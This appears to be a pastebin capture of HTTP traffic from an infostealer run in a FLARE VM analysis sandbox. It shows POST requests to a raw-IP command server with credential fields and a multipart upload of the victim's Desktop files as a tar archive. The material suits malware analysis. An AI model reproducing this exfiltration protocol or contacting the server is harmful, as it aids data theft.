Facebook
From Eratic Goat, 2 Years ago, written in Plain Text.
This paste is a reply to Re: Encoded And Decoded Strings Wireshark Traffic from Paltry Kangaroo - view diff
Embed
Download Paste or View Raw
Hits: 380
  1. POST /8vcWxwwx3/index.php HTTP/1.1
  2. Content-Type: application/x-www-form-urlencoded
  3. Host: 62.204.41.151
  4. Content-Length: 21
  5. Cache-Control: no-cache
  6.  
  7. id=795348421152&cred=HTTP/1.1 200 OK
  8. Server: nginx/1.18.0 (Ubuntu)
  9. Date: Wed, 11 Jan 2023 22:18:50 GMT
  10. Content-Type: text/html; charset=UTF-8
  11. Transfer-Encoding: chunked
  12. Connection: keep-alive
  13. Refresh: 0; url = Login.php
  14.  
  15. 0
  16.  
  17. POST /8vcWxwwx3/index.php?wal=1 HTTP/1.1
  18. Content-Type: multipart/form-data; boundary=----NzY4MA==
  19. Host: 62.204.41.151
  20. Content-Length: 7840
  21. Cache-Control: no-cache
  22.  
  23. ------NzY4MA==
  24. Content-Disposition: form-data; name="data"; filename="795348421152_Desktop.tar"
  25. Content-Type: application/octet-stream
  26.  
  27. Users/vm/AppData/Local/Temp/_Files_/available_packages.txt..........................................000666 .000000 .000000 .00000004254 14344065737 022125. 0....................................................................................................ustar.00................................................................000000 .000000 ..........................................................................................................................................................................0.1.0.e.d.i.t.o.r...v.m.|.1.2...0...1.
  28. .
  29. .7.z.i.p.-.1.5.-.0.5...v.m.|.1.5...0.5.
  30. .
  31. .a.p.i.m.o.n.i.t.o.r...v.m.|.2...1.3...0...2.0.2.2.0.2.2.4.
  32. .
  33. .a.p.k.t.o.o.l...v.m.|.2...7...0.
  34. .
  35. .a.s.r.e.p.r.o.a.s.t...v.m.|.0...0...0...2.0.1.8.0.9.2.5.
  36. .
  37. .b.l.o.o.d.h.o.u.n.d...v.m.|.4...2...0.
  38. .
  39. .c.a.p.a...v.m.|.4...0...1.
  40. .
  41. .c.m.d.e.r...v.m.|.1...3...2.0...2.0.2.2.1.2.0.1.
  42. .
  43. .c.o.m.m.o.n...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
  44. .
  45. .c.y.b.e.r.c.h.e.f...v.m.|.9...4.9...0...2.0.2.2.1.2.0.1.
  46. .
  47. .c.y.g.w.i.n...v.m.|.3...2...0...2.0.2.2.1.2.0.1.
  48. .
  49. .d.i.e...v.m.|.3...0.2...2.0.2.2.0.1.1.3.
  50. .
  51. .d.n.s.p.y.e.x...v.m.|.6...2...0.
  52. .
  53. .e.x.p.l.o.r.e.r.s.u.i.t.e...v.m.|.0...0...0...2.0.2.2.1.1.1.5.
  54. .
  55. .f.a.k.e.n.e.t.-.n.g...v.m.|.1...4...1.1...2.0.2.2.1.1.1.5.
  56. .
  57. .f.l.a.r.e.v.m...i.n.s.t.a.l.l.e.r...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
  58. .
  59. .f.l.o.s.s...v.m.|.2...1...0.
  60. .
  61. .g.h.i.d.r.a...v.m.|.1.0...1...2.
  62. .
  63. .g.o.b.u.s.t.e.r...v.m.|.3...0...1...2.0.2.2.0.1.1.3.
  64. .
  65. .h.a.s.h.m.y.f.i.l.e.s...v.m.|.0...0...0...2.0.2.2.0.1.1.3.
  66. .
  67. .i.d.a.f.r.e.e...v.m.|.7...6.
  68. .
  69. .l.i.b.r.a.r.i.e.s...p.y.t.h.o.n.2...v.m.|.0...0...0...2.0.2.2.1.2.0.3.
  70. .
  71. .l.i.b.r.a.r.i.e.s...p.y.t.h.o.n.3...v.m.|.0...0...0...2.0.2.2.1.2.0.3.
  72. .
  73. .m.a.p...v.m.|.0...2.4.
  74. .
  75. .n.e.t.w.o.r.k.m.i.n.e.r...v.m.|.2...7...3.
  76. .
  77. .n.o.t.e.p.a.d.p.l.u.s.p.l.u.s...v.m.|.8...4...7...2.0.2.2.1.1.2.9.
  78. .
  79. .n.o.t.e.p.a.d.p.p...p.l.u.g.i.n...c.o.m.p.a.r.e...v.m.|.2...0...1...2.0.2.1.1.2.2.5.
  80. .
  81. .o.l.l.y.d.b.g...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
  82. .
  83. .o.l.l.y.d.b.g...v.m.|.1...1.0...0...2.0.2.2.0.9.0.8.
  84. .
  85. .o.l.l.y.d.b.g.2...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
  86. .
  87. .o.l.l.y.d.b.g.2...v.m.|.2...0.1.
  88. .
  89. .p.e.i.d...v.m.|.0...9.5...0...2.0.2.2.1.1.1.5.
  90. .
  91. .p.r.o.c.e.s.s.d.u.m.p...v.m.|.2...1...1...2.0.2.2.0.9.0.8.
  92. .
  93. .r.e.g.s.h.o.t...v.m.|.1...9...1.
  94. .
  95. .r.u.n.d.o.t.n.e.t.d.l.l...v.m.|.2...2.
  96. .
  97. .s.y.s.i.n.t.e.r.n.a.l.s...v.m.|.2.0.2.2...1.1...2.8...2.0.2.2.1.2.0.1.
  98. .
  99. .u.n.i.e.x.t.r.a.c.t.2...v.m.|.2...0...0...2.0.2.2.0.1.1.3.
  100. .
  101. .v.c.b.u.i.l.d.t.o.o.l.s...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
  102. .
  103. .w.i.r.e.s.h.a.r.k...v.m.|.3...6...0...2.0.2.2.1.2.0.2.
  104. .
  105. .x.6.4.d.b.g...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
  106. .
  107. .x.6.4.d.b.g...v.m.|.2.0.2.1...0.5...0.8.
  108. .
  109. .x.6.4.d.b.g.p.y...v.m.|.1...0...5.6...2.0.2.1.1.0.2.1.
  110. .
  111. .....................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/failed_packages.txt.............................................000666 .000000 .000000 .00000000226 14344401701 021405. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................ghidra
  112. Cygwin
  113. python3
  114.  
  115. wireshark
  116. GoogleChrome
  117. ghidra
  118. Cygwin
  119. python3
  120. wireshark
  121. GoogleChrome
  122. ghidra
  123. Cygwin
  124. python3
  125. wireshark
  126. GoogleChrome
  127. ..........................................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/README.txt......................................................000666 .000000 .000000 .00000003053 14344541053 017266. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................        ______ _               _____  ______   __      ____  __
  128.        |  ____| |        /   |  __ |  ____|       / /  /  |
  129.        | |__  | |       /    | |__) | |__ _____   / /|   / |
  130.        |  __| | |      / /  |  _  /|  __|______ / / | |/| |
  131.        | |    | |____ / ____ | |  | |____        /  | |  | |
  132.        |_|    |______/_/    __|  _______|      /   |_|  |_|
  133.             M A L W A R E   A N A L Y S I S   E D I T I O N                                                                              
  134.         ________________________________________________________
  135.                                Developed by                        
  136.              FLARE (FireEye Labs Advanced Reverse Engineering)
  137.                           [email protected]                  
  138.         ________________________________________________________
  139.                                                          
  140. Welcome to FLARE VM - Malware Analysis Edition! The distribution contains a
  141. number of tools and configurations to enhance malware analysis and reverse
  142. engineering tasks.
  143.  
  144. Please change the virtual machine network mode to Host Only to prevent malware
  145. from escaping the environment. Finally, take a snapshot so that you could always
  146. revert to a clean image.
  147.  
  148. You can customize the image by downloading additional packages. For example, to
  149. install Firefox simply type the following:
  150.  
  151.   cinst firefox
  152.  
  153. To keep the distribution up to date, restore networking to NAT or Bridge and type
  154. in the following command in the Administrator console:
  155.  
  156.   cup all
  157.  
  158. Happy Reversing!
  159. .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
  160. ------NzY4MA==--
  161. HTTP/1.1 200 OK
  162. Server: nginx/1.18.0 (Ubuntu)
  163. Date: Wed, 11 Jan 2023 22:18:56 GMT
  164. Content-Type: text/html; charset=UTF-8
  165. Transfer-Encoding: chunked
  166. Connection: keep-alive
  167.  
  168. 0
  169.  
  170.